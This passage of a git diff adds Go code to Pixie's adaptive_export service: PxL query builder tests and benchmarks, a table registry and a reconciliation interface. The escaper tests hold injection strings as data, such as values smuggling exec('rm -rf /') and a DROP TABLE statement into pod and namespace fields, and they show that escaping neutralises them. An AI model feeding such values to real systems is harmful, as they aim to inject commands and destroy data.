Apache-2.0 + +package pxl + +import ( + "testing" + "time" + + "px.dev/pixie/src/vizier/services/adaptive_export/internal/anomaly" +) + +// pxl.QueryFor sits on the controller fan-out path: ONE QueryFor call +// per (anomaly_hash, table) tuple per pass. With 11 PushPixieTables and +// N active anomaly windows, the per-pass cost is 11×N QueryFor calls +// (plus 11×N broker queries that the QueryFor strings parameterise). +// +// At sustained 100 active anomalies → 1100 QueryFor/sec. Allocation +// behaviour of fmt.Sprintf-style string builders is what the bench +// quantifies — informs whether sync.Pool'd strings.Builder would pay +// off if QueryFor turns up in CPU profiles. + +func BenchmarkQueryFor_http_events(b *testing.B) { + t := anomaly.Target{ + PID: 12345, + Comm: "java", + Pod: "backend-vulnerable-779cd9d765-mxr8t", + Namespace: "log4j-poc", + } + now := time.Now() + start := now.Add(-30 * time.Second) + b.ReportAllocs() + b.ResetTimer() + for i := 0; i < b.N; i++ { + _, _ = QueryFor("http_events", t, start, now, now) + } +} + +// BenchmarkQueryFor_AllTables varies the table across all 13 BuiltinTables +// to ensure we're not missing a slow-path on a specific table. +func BenchmarkQueryFor_AllTables(b *testing.B) { + t := anomaly.Target{ + PID: 12345, + Comm: "java", + Pod: "backend-vulnerable-779cd9d765-mxr8t", + Namespace: "log4j-poc", + } + now := time.Now() + start := now.Add(-30 * time.Second) + tables := Names(Builtins()) + b.ReportAllocs() + b.ResetTimer() + for i := 0; i < b.N; i++ { + _, _ = QueryFor(tables[i%len(tables)], t, start, now, now) + } +} diff --git a/src/vizier/services/adaptive_export/internal/pxl/queryfor_test.go b/src/vizier/services/adaptive_export/internal/pxl/queryfor_test.go new file mode 100644 index 00000000000..562ea794cc0 --- /dev/null +++ b/src/vizier/services/adaptive_export/internal/pxl/queryfor_test.go @@ -0,0 +1,342 @@ +// Copyright 2018- The Pixie Authors. +// +// Licensed under the Apache License, Version 2.0 (the "License"); +// you may not use this file except in compliance with the License. +// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, software +// distributed under the License is distributed on an "AS IS" BASIS, +// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +// See the License for the specific language governing permissions and +// limitations under the License. +// +// SPDX-License-Identifier: Apache-2.0 + +package pxl + +import ( + "errors" + "strings" + "testing" + "time" + + "px.dev/pixie/src/vizier/services/adaptive_export/internal/anomaly" +) + +// fixed reference time for deterministic relStart computation. +var ( + fixedNow = time.Date(2026, 5, 9, 15, 23, 44, 0, time.UTC) + fixedStart = fixedNow.Add(-5 * time.Minute) // ATTACK − 5 min + fixedEnd = fixedNow.Add(5 * time.Minute) // ATTACK + 5 min + target = anomaly.Target{ + PID: 12345, Comm: "redis-server", + Pod: "redis-6fbcfb97c-82qxv", Namespace: "redis", + } +) + +// TestQueryFor_UnknownTable — non-builtin tables wrap ErrUnknownTable. +func TestQueryFor_UnknownTable(t *testing.T) { + _, err := QueryFor("nope_table", target, fixedStart, fixedEnd, fixedNow) + if err == nil || !errors.Is(err, ErrUnknownTable) { + t.Fatalf("want ErrUnknownTable wrapper, got %v", err) + } + if !strings.Contains(err.Error(), `"nope_table"`) { + t.Fatalf("error must echo the bad table name; got %v", err) + } +} + +// TestQueryFor_NamespacedPodFilter — px.upid_to_pod_name returns +// "/" (verified in carnot's metadata_ops.h:387). The +// generated PxL must filter against the namespaced key when both +// fields are non-empty. +func TestQueryFor_NamespacedPodFilter(t *testing.T) { + q, err := QueryFor("redis_events", target, fixedStart, fixedEnd, fixedNow) + if err != nil { + t.Fatalf("QueryFor: %v", err) + } + wantPodFilter := `df = df[df.pod == 'redis/redis-6fbcfb97c-82qxv']` + if !strings.Contains(q, wantPodFilter) { + t.Fatalf("expected pod filter %q in:\n%s", wantPodFilter, q) + } + wantNS := `df = df[df.namespace == 'redis']` + if !strings.Contains(q, wantNS) { + t.Fatalf("expected namespace filter %q in:\n%s", wantNS, q) + } +} + +// TestQueryFor_NamespaceOnly — only namespace filter when Pod is empty. +func TestQueryFor_NamespaceOnly(t *testing.T) { + tNoPod := anomaly.Target{Namespace: "redis"} + q, err := QueryFor("redis_events", tNoPod, fixedStart, fixedEnd, fixedNow) + if err != nil { + t.Fatalf("QueryFor: %v", err) + } + if !strings.Contains(q, `df = df[df.namespace == 'redis']`) { + t.Fatalf("expected namespace filter; got:\n%s", q) + } + if strings.Contains(q, "df = df[df.pod ==") { + t.Fatalf("did not expect pod filter when Pod is empty; got:\n%s", q) + } +} + +// TestQueryFor_PodOnly — when Namespace is empty but Pod is set, fall +// back to a regex match on `*/` since px.upid_to_pod_name always +// returns "/" — a bare-pod equality filter would always +// miss. The defensive path stays usable instead of being silently broken. +func TestQueryFor_PodOnly(t *testing.T) { + tNoNS := anomaly.Target{Pod: "redis-foo"} + q, err := QueryFor("redis_events", tNoNS, fixedStart, fixedEnd, fixedNow) + if err != nil { + t.Fatalf("QueryFor: %v", err) + } + // Must NOT emit the bare-pod equality (CR: that's a known-miss filter). + if strings.Contains(q, `df = df[df.pod == 'redis-foo']`) { + t.Fatalf("regression: emitted bare-pod equality that always misses:\n%s", q) + } + // Must emit a working filter that matches "/redis-foo". + want := `df = df[px.regex_match('^[^/]+/redis-foo$', df.pod)]` + if !strings.Contains(q, want) { + t.Fatalf("expected regex-anchored pod filter\nwant: %s\ngot:\n%s", want, q) + } + if strings.Contains(q, "df = df[df.namespace ==") { + t.Fatalf("did not expect namespace filter; got:\n%s", q) + } +} + +// TestQueryFor_NoTargetFilters — empty Target → no namespace OR pod +// filter (caller-driven coarse query). +func TestQueryFor_NoTargetFilters(t *testing.T) { + q, err := QueryFor("redis_events", anomaly.Target{}, fixedStart, fixedEnd, fixedNow) + if err != nil { + t.Fatalf("QueryFor: %v", err) + } + if strings.Contains(q, "df.namespace ==") || strings.Contains(q, "df.pod ==") { + t.Fatalf("expected no namespace/pod filter for empty Target; got:\n%s", q) + } +} + +// TestQueryFor_TimeBoundsAreInclusiveLowerExclusiveUpper — sliceStart +// is `>=`; sliceEnd is `<`. Encoded as nanos. +func TestQueryFor_TimeBoundsAreInclusiveLowerExclusiveUpper(t *testing.T) { + q, err := QueryFor("redis_events", target, fixedStart, fixedEnd, fixedNow) + if err != nil { + t.Fatalf("QueryFor: %v", err) + } + wantLower := `df = df[df.time_ >= px.int64_to_time(1778339924000000000)]` // 15:18:44 UTC ns + wantUpper := `df = df[df.time_ < px.int64_to_time(1778340524000000000)]` // 15:28:44 UTC ns + if !strings.Contains(q, wantLower) { + t.Fatalf("expected lower bound %q in:\n%s", wantLower, q) + } + if !strings.Contains(q, wantUpper) { + t.Fatalf("expected upper bound %q in:\n%s", wantUpper, q) + } +} + +// TestQueryFor_RelativeStartTime — pad covers (now − sliceStart) plus +// 30 s. With ATTACK − 5min as sliceStart and now == ATTACK, pad is +// 5 min + 30 s = 330 s. +func TestQueryFor_RelativeStartTime(t *testing.T) { + q, err := QueryFor("redis_events", target, fixedStart, fixedEnd, fixedNow) + if err != nil { + t.Fatalf("QueryFor: %v", err) + } + if !strings.Contains(q, "start_time='-330s'") { + t.Fatalf("expected start_time='-330s' in:\n%s", q) + } +} + +// TestQueryFor_PadFloorOn30sWhenSliceStartIsFuture — caller-bug case; +// pad clamps to 30 s rather than emitting a positive (forward) start. +func TestQueryFor_PadFloorOn30sWhenSliceStartIsFuture(t *testing.T) { + futureStart := fixedNow.Add(1 * time.Minute) // sliceStart > now + q, err := QueryFor("redis_events", target, futureStart, fixedEnd, fixedNow) + if err != nil { + t.Fatalf("QueryFor: %v", err) + } + if !strings.Contains(q, "start_time='-30s'") { + t.Fatalf("expected start_time='-30s' clamp in:\n%s", q) + } +} + +// TestQueryFor_EscapesSingleQuoteInTarget — apostrophes in pod / +// namespace get backslash-escaped so they don't break out of the +// PxL string literal. +func TestQueryFor_EscapesSingleQuoteInTarget(t *testing.T) { + tWeird := anomaly.Target{Namespace: "ns'with'quotes", Pod: "p'od"} + q, err := QueryFor("redis_events", tWeird, fixedStart, fixedEnd, fixedNow) + if err != nil { + t.Fatalf("QueryFor: %v", err) + } + if !strings.Contains(q, `df = df[df.namespace == 'ns\'with\'quotes']`) { + t.Fatalf("expected escaped namespace; got:\n%s", q) + } + if !strings.Contains(q, `df = df[df.pod == 'ns\'with\'quotes/p\'od']`) { + t.Fatalf("expected escaped namespaced pod key; got:\n%s", q) + } +} + +// TestQueryFor_EscapesBackslashInTarget — backslashes too. Asserts +// both namespace and the namespaced pod-key forms are escaped, so a +// `Pod` containing `\` can't terminate the PxL string literal. +func TestQueryFor_EscapesBackslashInTarget(t *testing.T) { + tWeird := anomaly.Target{Namespace: `ns\back`, Pod: `p\od`} + q, err := QueryFor("redis_events", tWeird, fixedStart, fixedEnd, fixedNow) + if err != nil { + t.Fatalf("QueryFor: %v", err) + } + if !strings.Contains(q, `df = df[df.namespace == 'ns\\back']`) { + t.Fatalf("expected escaped namespace; got:\n%s", q) + } + if !strings.Contains(q, `df = df[df.pod == 'ns\\back/p\\od']`) { + t.Fatalf("expected escaped namespaced pod key; got:\n%s", q) + } +} + +// TestQueryFor_EveryBuiltinTableEmits — smoke-test all known tables +// produce a syntactically-shaped PxL output (compile-not-tested). +func TestQueryFor_EveryBuiltinTableEmits(t *testing.T) { + for _, table := range Names(builtinTables) { + q, err := QueryFor(table, target, fixedStart, fixedEnd, fixedNow) + if err != nil { + t.Fatalf("table %s: %v", table, err) + } + if !strings.HasPrefix(q, "#px:set max_output_rows_per_table=1000000\nimport px\n") { + t.Fatalf("table %s: expected #px:set cap header then import px; got:\n%s", table, q) + } + if !strings.Contains(q, "px.display(df, '"+table+"')") { + t.Fatalf("table %s: expected px.display call with table name; got:\n%s", table, q) + } + } +} + +// TestEscapePxL_TableDriven — direct coverage of the escaper. Every byte +// that could break out of a single-quoted PxL string literal must come +// back as a non-breaking escape sequence. +func TestEscapePxL_TableDriven(t *testing.T) { + cases := []struct{ in, want string }{ + {"", ""}, + {"plain", "plain"}, + {"o'malley", `o\'malley`}, + {`back\slash`, `back\\slash`}, + {`mix'and\back`, `mix\'and\\back`}, + {"'; DROP TABLE alerts; --", `\'; DROP TABLE alerts; --`}, + // Byte-level string-breaking attempts: a raw \n would terminate + // the PxL statement and inject a new one on the next line. The + // escaper turns these into Python-style escape sequences that + // PxL renders as inert backslash-letter pairs inside the string. + {"line1\nline2", `line1\nline2`}, + {"line1\r\nline2", `line1\r\nline2`}, + {"col1\tcol2", `col1\tcol2`}, + {"trailing\x00", `trailing\0`}, + // The full injection probe targeting Target.Pod/Target.Namespace: + // close the literal, inject a new statement, comment out the + // trailing fragment. The escaper neutralises the close + newline; + // the trailing # stays as a literal '#' inside the string. + {"redis-pod', exec('rm -rf /'), '\n#", `redis-pod\', exec(\'rm -rf /\'), \'\n#`}, + } + for _, c := range cases { + if got := escapePxL(c.in); got != c.want { + t.Errorf("escapePxL(%q) = %q, want %q", c.in, got, c.want) + } + } +} + +// TestQueryFor_RejectsInjectionInTargetFields drives QueryFor with +// adversarial Pod/Namespace values and asserts the resulting PxL has +// EXACTLY the line count of a clean call — proving an injected newline +// can't add a statement, and the embedded literal stays single-quoted. +// +// PxL line breakdown for a fully-populated Target (cf. QueryFor): +// +// #px:set ... 1 +// import px 1 +// df = px.DataFrame(...) 1 +// df = df[df.time_ >= ...] 1 +// df = df[df.time_ < ...] 1 +// df.namespace = px.upid_to_namespace(...) 1 +// df.pod = px.upid_to_pod_name(...) 1 +// df = df[df.namespace == '...'] 1 +// df = df[df.pod == '...'] 1 +// px.display(df, '...') 1 +// (trailing newline → empty 11th split) 1 +// +// Total: 10 statements + trailing empty == strings.Split == 11 entries. +func TestQueryFor_RejectsInjectionInTargetFields(t *testing.T) { + const wantLines = 11 + + cases := []struct { + name string + target anomaly.Target + }{ + { + name: "newline-in-pod", + target: anomaly.Target{Pod: "p\n', exec('rm -rf /'), '", Namespace: "ns"}, + }, + { + name: "newline-in-namespace", + target: anomaly.Target{Pod: "p", Namespace: "ns\n', exec('rm -rf /'), '"}, + }, + { + name: "single-quote-only", + target: anomaly.Target{Pod: "p'); display('owned", Namespace: "ns"}, + }, + { + name: "carriage-return", + target: anomaly.Target{Pod: "p\rexec('owned')", Namespace: "ns"}, + }, + { + name: "backslash-escape-of-escape", + target: anomaly.Target{Pod: `p\', exec('owned'), \'`, Namespace: "ns"}, + }, + { + name: "null-byte", + target: anomaly.Target{Pod: "p\x00bonus", Namespace: "ns"}, + }, + { + name: "tab-bytes", + target: anomaly.Target{Pod: "p\texec('owned')", Namespace: "ns"}, + }, + } + for _, c := range cases { + t.Run(c.name, func(t *testing.T) { + q, err := QueryFor("http_events", c.target, fixedStart, fixedEnd, fixedNow) + if err != nil { + t.Fatalf("QueryFor: %v", err) + } + if got := strings.Count(q, "\n") + 1; got != wantLines { + t.Fatalf("got %d lines, want %d (injection succeeded?)\n%s", got, wantLines, q) + } + // The exact statement count: each line must start with + // either #px:, import, df, or px.display — anything else is + // a smuggled call. + for i, line := range strings.Split(q, "\n") { + if line == "" { + continue + } + if !strings.HasPrefix(line, "#px:") && + !strings.HasPrefix(line, "import ") && + !strings.HasPrefix(line, "df") && + !strings.HasPrefix(line, "px.display") { + t.Fatalf("line %d looks injected: %q\nfull script:\n%s", i, line, q) + } + } + }) + } +} + +// TestQueryFor_PodOnlyRegexEscapesQuoteMetaInjection — the bare-pod +// fallback uses regexp.QuoteMeta + escapePxL; verify a pod name carrying +// regex meta chars + a single quote both survive without breaking out +// of the px.regex_match literal. +func TestQueryFor_PodOnlyRegexEscapesQuoteMetaInjection(t *testing.T) { + tgt := anomaly.Target{Pod: "p.*'; exec('owned')"} + q, err := QueryFor("http_events", tgt, fixedStart, fixedEnd, fixedNow) + if err != nil { + t.Fatalf("QueryFor: %v", err) + } + if strings.Contains(q, "exec(") || strings.Count(q, "\n") > 9 { + t.Fatalf("pod-only path injection succeeded:\n%s", q) + } +} diff --git a/src/vizier/services/adaptive_export/internal/pxl/tables.go b/src/vizier/services/adaptive_export/internal/pxl/tables.go new file mode 100644 index 00000000000..c29284ad58a --- /dev/null +++ b/src/vizier/services/adaptive_export/internal/pxl/tables.go @@ -0,0 +1,132 @@ +// Copyright 2018- The Pixie Authors. +// +// Licensed under the Apache License, Version 2.0 (the "License"); +// you may not use this file except in compliance with the License. +// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, software +// distributed under the License is distributed on an "AS IS" BASIS, +// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +// See the License for the specific language governing permissions and +// limitations under the License. +// +// SPDX-License-Identifier: Apache-2.0 + +// Package pxl carries the strongly-typed list of pixie observation +// tables the adaptive-write feature targets, plus a stub Registry +// extension point for the future-PR work that lets users plug in their +// own tables alongside their UI-defined retention scripts. +// +// Importantly: the operator does NOT execute PxL itself in the current +// design. Pixie's retention plugin runs the user-defined PxL scripts +// and populates ClickHouse. This package is only used to: +// - enumerate the pixie tables the operator is aware of +// - keep a stable, named, audit-friendly set (no dynamic discovery) +// - declare the future Registry extension surface +package pxl + +// TableSpec is the strongly-typed identity of one pixie socket_tracer +// table the operator knows about. Bare-string identifiers are +// deliberately avoided in callers — TableSpec carries the table name +// today and is the natural place to attach future fields (column +// projections, retention TTLs, semantic tags) without breaking the API. +type TableSpec struct { + // Name is the ClickHouse / Pixie table name. Dotted names + // (e.g. "http2_messages.beta") are stored verbatim; backtick + // quoting is the responsibility of SQL emitters. + Name string + + // Protocol is the wire protocol the table observes. Documentary; + // helps an operator audit "which tables are about HTTP". + Protocol string +} + +// builtinTables enumerates the 13 pixie socket_tracer tables the +// adaptive-write feature is shipped with. The order is stable and +// matches the project's published documentation. Do NOT loop over +// dynamic discovery to populate this — strong static definition is +// the requirement. Unexported so the slice cannot be mutated by +// external callers; use [Builtins] or [DefaultRegistry] for read +// access (both return defensive copies). +// +// conn_stats was previously out-of-scope (rev-1) but is re-added for +// the rev-2 schema — the rev-2 ClickHouse schema now carries it and the +// retention-script preset emits it alongside the protocol-events +// tables. Unlike the protocol tables it carries counters, not +// per-message rows; ClickHouse MERGEs snapshot rows over the order +// key (no aggregating engine — each retention-script pull is its own +// snapshot row). +var builtinTables = []TableSpec{ + {Name: "http_events", Protocol: "HTTP/1.x"}, + {Name: "http2_messages.beta", Protocol: "HTTP/2 + gRPC"}, + {Name: "dns_events", Protocol: "DNS"}, + {Name: "redis_events", Protocol: "Redis (RESP)"}, + {Name: "mysql_events", Protocol: "MySQL"}, + {Name: "pgsql_events", Protocol: "PostgreSQL"}, + {Name: "cql_events", Protocol: "Cassandra / CQL"}, + {Name: "mongodb_events", Protocol: "MongoDB"}, + {Name: "kafka_events.beta", Protocol: "Kafka"}, + {Name: "amqp_events", Protocol: "AMQP / RabbitMQ"}, + {Name: "mux_events", Protocol: "Mux (Twitter Finagle)"}, + {Name: "tls_events", Protocol: "TLS handshake"}, + {Name: "conn_stats", Protocol: "Connection-level statistics"}, +} + +// Registry is the extension surface for users to register their own +// tables alongside the built-ins. STUB — not wired into the controller +// or main.go in this PR. The intended future shape is: +// +// ctlCfg.Registry = pxl.Compose(pxl.DefaultRegistry(), userRegistry) +// +// where Compose merges built-ins with user additions, and the +// controller iterates Registry.Tables() instead of builtinTables. +// +// Today the controller and main.go consume BuiltinTables directly. +// The future PR will plumb a Registry through controller.Config and +// rewrite the consumers. +type Registry interface { + Tables() []TableSpec +} + +// DefaultRegistry returns a Registry over the built-in tables. +// Future-PR callers compose this with user-supplied registries. +func DefaultRegistry() Registry { return defaultRegistry{} } + +type defaultRegistry struct{} + +// Tables returns a defensive copy so callers cannot mutate the +// package-level table list at runtime. +func (defaultRegistry) Tables() []TableSpec { + return append([]TableSpec(nil), builtinTables...) +} + +// Builtins returns a defensive copy of the built-in table list. +// Prefer this over a (now removed) exported slice so the global +// registry cannot be aliased and mutated by callers. +func Builtins() []TableSpec { + return append([]TableSpec(nil), builtinTables...) +} + +// Names projects a []TableSpec to a []string for legacy callers that +// take bare names. Useful at API boundaries that haven't been +// strong-typed yet (controller.Config.Tables is one). +func Names(specs []TableSpec) []string { + out := make([]string, len(specs)) + for i, s := range specs { + out[i] = s.Name + } + return out +} + +// IsBuiltin reports whether the given name is one of the built-in +// tables. Bare-string callers can use this as a defensive guard. +func IsBuiltin(name string) bool { + for _, t := range builtinTables { + if t.Name == name { + return true + } + } + return false +} diff --git a/src/vizier/services/adaptive_export/internal/pxl/tables_test.go b/src/vizier/services/adaptive_export/internal/pxl/tables_test.go new file mode 100644 index 00000000000..273c0f625ee --- /dev/null +++ b/src/vizier/services/adaptive_export/internal/pxl/tables_test.go @@ -0,0 +1,128 @@ +// Copyright 2018- The Pixie Authors. +// +// Licensed under the Apache License, Version 2.0 (the "License"); +// you may not use this file except in compliance with the License. +// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, software +// distributed under the License is distributed on an "AS IS" BASIS, +// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +// See the License for the specific language governing permissions and +// limitations under the License. +// +// SPDX-License-Identifier: Apache-2.0 + +package pxl + +import ( + "testing" +) + +// TestBuiltinTables_Count — guard against accidental list churn. +// The set is the 13 socket_tracer tables in pixie's stirling layer +// (http_events, http2_messages.beta, dns_events, redis_events, +// mysql_events, pgsql_events, cql_events, mongodb_events, +// kafka_events.beta, amqp_events, mux_events, tls_events, conn_stats). +// Update this guard if the spec adds / removes a table. +func TestBuiltinTables_Count(t *testing.T) { + const want = 13 + if got := len(builtinTables); got != want { + t.Fatalf("builtinTables = %d entries, want %d", got, want) + } +} + +// TestBuiltinTables_AllNamesUnique — no duplicates. +func TestBuiltinTables_AllNamesUnique(t *testing.T) { + seen := map[string]bool{} + for _, sp := range builtinTables { + if seen[sp.Name] { + t.Fatalf("duplicate table %q in builtinTables", sp.Name) + } + seen[sp.Name] = true + } +} + +// TestBuiltinTables_AllHaveProtocol — each entry is annotated, so audit +// queries like "which tables observe HTTP?" work without parsing the name. +func TestBuiltinTables_AllHaveProtocol(t *testing.T) { + for _, sp := range builtinTables { + if sp.Protocol == "" { + t.Fatalf("BuiltinTable %q missing Protocol annotation", sp.Name) + } + } +} + +// TestIsBuiltin — defensive guard for bare-string callers. +func TestIsBuiltin(t *testing.T) { + if !IsBuiltin("redis_events") { + t.Fatalf("redis_events should be a builtin") + } + if !IsBuiltin("http2_messages.beta") { + t.Fatalf("dotted table http2_messages.beta should be a builtin") + } + if !IsBuiltin("conn_stats") { + t.Fatalf("conn_stats was re-added; should be builtin") + } + if IsBuiltin("") { + t.Fatalf("empty string should not be builtin") + } +} + +// TestDefaultRegistry — stub returns builtinTables. +func TestDefaultRegistry(t *testing.T) { + r := DefaultRegistry() + got := r.Tables() + if len(got) != len(builtinTables) { + t.Fatalf("DefaultRegistry().Tables() len %d, want %d", len(got), len(builtinTables)) + } + for i, sp := range builtinTables { + if got[i] != sp { + t.Fatalf("DefaultRegistry().Tables()[%d] = %+v, want %+v", i, got[i], sp) + } + } +} + +// TestNames — projection to []string preserves order. +func TestNames(t *testing.T) { + names := Names(builtinTables) + if len(names) != len(builtinTables) { + t.Fatalf("Names len mismatch") + } + if names[0] != "http_events" { + t.Fatalf("first name = %q, want http_events", names[0]) + } +} + +// TestDefaultRegistry_Tables_IsCopy — defensive: callers cannot mutate +// the package-level table list by aliasing the slice returned from +// DefaultRegistry().Tables(). Append-to-zero-cap is the easy gotcha: +// if Tables() handed out the backing slice directly, an append-without- +// reallocation would clobber the next builtin. +func TestDefaultRegistry_Tables_IsCopy(t *testing.T) { + got := DefaultRegistry().Tables() + if len(got) == 0 { + t.Fatalf("DefaultRegistry().Tables() is empty") + } + want0 := builtinTables[0].Name + got[0].Name = "MUTATED" + if builtinTables[0].Name != want0 { + t.Fatalf("mutation through DefaultRegistry().Tables() leaked: builtinTables[0].Name=%q, want %q", + builtinTables[0].Name, want0) + } +} + +// TestBuiltins_IsCopy — same guarantee for the Builtins() accessor. +func TestBuiltins_IsCopy(t *testing.T) { + got := Builtins() + if len(got) == 0 { + t.Fatalf("Builtins() is empty") + } + want0 := builtinTables[0].Name + got[0].Name = "MUTATED" + if builtinTables[0].Name != want0 { + t.Fatalf("mutation through Builtins() leaked: builtinTables[0].Name=%q, want %q", + builtinTables[0].Name, want0) + } +} diff --git a/src/vizier/services/adaptive_export/internal/reconcile/BUILD.bazel b/src/vizier/services/adaptive_export/internal/reconcile/BUILD.bazel new file mode 100644 index 00000000000..3b0dafe2ebf --- /dev/null +++ b/src/vizier/services/adaptive_export/internal/reconcile/BUILD.bazel @@ -0,0 +1,24 @@ +# Copyright 2018- The Pixie Authors. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. +# +# SPDX-License-Identifier: Apache-2.0 + +load("@io_bazel_rules_go//go:def.bzl", "go_library") + +go_library( + name = "reconcile", + srcs = ["reconcile.go"], + importpath = "px.dev/pixie/src/vizier/services/adaptive_export/internal/reconcile", + visibility = ["//src/vizier/services/adaptive_export:__subpackages__"], +) diff --git a/src/vizier/services/adaptive_export/internal/reconcile/reconcile.go b/src/vizier/services/adaptive_export/internal/reconcile/reconcile.go new file mode 100644 index 00000000000..3470ca92339 --- /dev/null +++ b/src/vizier/services/adaptive_export/internal/reconcile/reconcile.go @@ -0,0 +1,65 @@ +// Copyright 2018- The Pixie Authors. +// +// Licensed under the Apache License, Version 2.0 (the "License"); +// you may not use this file except in compliance with the License. +// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, software +// distributed under the License is distributed on an "AS IS" BASIS, +// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +// See the License for the specific language governing permissions and +// limitations under the License. +// +// SPDX-License-Identifier: Apache-2.0 + +// Package reconcile is the per-pull write-fidelity instrument for AE +// (gated by ADAPTIVE_RECONCILE). It is a LEAF package — it imports none +// of AE's other internal packages, so passthrough / controller / streaming +// can all depend on it and the sink can implement it with no import cycle. +// +// Each data-plane pull records ONE Row: how many rows AE READ back from +// Pixie for a (table, pod, window), and how many it WROTE to ClickHouse. +// Reconciliation then localizes any loss to a single hop: +// - read < px-direct PEM count → query/window/filter miss (hop R5) +// - wrote < read → sink/batch drop (hop R6) +// - CH distinct > read → re-pull duplication (C8, quantified) +// +// The records land in forensic_db.ae_reconcile (see the CH-backed Recorder +// in the sink package). Best-effort: a failed reconcile write is logged, +// never fatal, and never blocks the data path. +package reconcile + +import ( + "context" + "time" +) + +// Row is one per-pull reconciliation record. +type Row struct { + TS time.Time // when AE finished this pull + Mode string // "filter" | "passthrough" | "streaming" + Table string // pixie table, e.g. "conn_stats" + Namespace string // target ns ("" for unfiltered passthrough/streaming) + Pod string // target pod ("" for unfiltered) + WinStart time.Time // PxL slice lower bound (time_ >= WinStart) + WinEnd time.Time // PxL slice upper bound (time_ < WinEnd) + ReadCount int64 // rows Pixie returned for this pull + WroteCount int64 // rows AE sent to CH (0 on write failure / empty) + WriteErr string // query or sink error, "" on success + Hostname string // node name +} + +// Recorder persists reconciliation Rows. Implementations MUST be +// best-effort and non-blocking-on-failure (the data path must never stall +// because reconciliation logging failed). +type Recorder interface { + Record(ctx context.Context, r Row) +} + +// Nop is the disabled-flag Recorder. It drops every Row. +type Nop struct{} + +// Record implements Recorder. +func (Nop) Record(context.Context, Row) {} diff --git a/src/vizier/services/adaptive_export/internal/script/script.go b/src/vizier/services/adaptive_export/internal/script/script.go index 23005ec8851..b44fb7aeb0f 100644 --- a/src/vizier/services/adaptive_export/internal/script/script.go +++ b/src/vizier/services/adaptive_export/internal/script/script.go @@ -16,24 +16,9 @@ package script -import ( - "fmt" - "strings" -) - -const ( - scriptPrefix = "ch-" -) - -type ScriptConfig struct { - ClusterName string - ClusterId string - CollectInterval int64 -} - type Script struct { ScriptDefinition - ScriptId string + ScriptID string ClusterIds string } @@ -44,71 +29,3 @@ type ScriptDefinition struct { Script string `yaml:"script"` IsPreset bool `yaml:"-"` } - -type ScriptActions struct { - ToDelete []*Script - ToUpdate []*Script - ToCreate []*Script -} - -func IsClickHouseScript(scriptName string) bool { - return strings.HasPrefix(scriptName, scriptPrefix) -} - -func IsScriptForCluster(scriptName, clusterName string) bool { - return IsClickHouseScript(scriptName) && strings.HasSuffix(scriptName, "-"+clusterName) -} - -func GetActions(scriptDefinitions []*ScriptDefinition, currentScripts []*Script, config ScriptConfig) ScriptActions { - definitions := make(map[string]ScriptDefinition) - for _, definition := range scriptDefinitions { - scriptName := getScriptName(definition.Name, config.ClusterName) - frequencyS := getInterval(definition, config) - if frequencyS > 0 { - definitions[scriptName] = ScriptDefinition{ - Name: scriptName, - Description: definition.Description, - FrequencyS: frequencyS, - Script: templateScript(definition, config), - } - } - } - actions := ScriptActions{} - for _, current := range currentScripts { - if definition, present := definitions[current.Name]; present { - if definition.Script != current.Script || definition.FrequencyS != current.FrequencyS || config.ClusterId != current.ClusterIds { - actions.ToUpdate = append(actions.ToUpdate, &Script{ - ScriptDefinition: definition, - ScriptId: current.ScriptId, - ClusterIds: config.ClusterId, - }) - } - delete(definitions, current.Name) - } else if IsClickHouseScript(current.Name) { - actions.ToDelete = append(actions.ToDelete, current) - } - } - for _, definition := range definitions { - actions.ToCreate = append(actions.ToCreate, &Script{ - ScriptDefinition: definition, - ClusterIds: config.ClusterId, - }) - } - return actions -} - -func getScriptName(scriptName string, clusterName string) string { - return fmt.Sprintf("%s%s-%s", scriptPrefix, scriptName, clusterName) -} - -func getInterval(definition *ScriptDefinition, config ScriptConfig) int64 { - if definition.FrequencyS == 0 { - return config.CollectInterval - } - return definition.FrequencyS -} - -func templateScript(definition *ScriptDefinition, config ScriptConfig) string { - // Return script as-is without any processing - return definition.Script -} diff --git a/src/vizier/services/adaptive_export/internal/sink/BUILD.bazel b/src/vizier/services/adaptive_export/internal/sink/BUILD.bazel new file mode 100644 index 00000000000..277372892dd --- /dev/null +++ b/src/vizier/services/adaptive_export/internal/sink/BUILD.bazel @@ -0,0 +1,50 @@ +# Copyright 2018- The Pixie Authors. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. +# +# SPDX-License-Identifier: Apache-2.0 + +load("@io_bazel_rules_go//go:def.bzl", "go_library") +load("//bazel:pl_build_system.bzl", "pl_go_test") + +go_library( + name = "sink", + srcs = [ + "clickhouse.go", + "fastencode.go", + ], + importpath = "px.dev/pixie/src/vizier/services/adaptive_export/internal/sink", + visibility = ["//src/vizier/services/adaptive_export:__subpackages__"], + deps = [ + "//src/vizier/services/adaptive_export/internal/anomaly", + "//src/vizier/services/adaptive_export/internal/chhttp", + "//src/vizier/services/adaptive_export/internal/clickhouse", + "//src/vizier/services/adaptive_export/internal/reconcile", + "@com_github_sirupsen_logrus//:logrus", + ], +) + +pl_go_test( + name = "sink_test", + srcs = [ + "clickhouse_test.go", + "content_type_contract_test.go", + "encode_bench_test.go", + "fastencode_test.go", + ], + embed = [":sink"], + deps = [ + 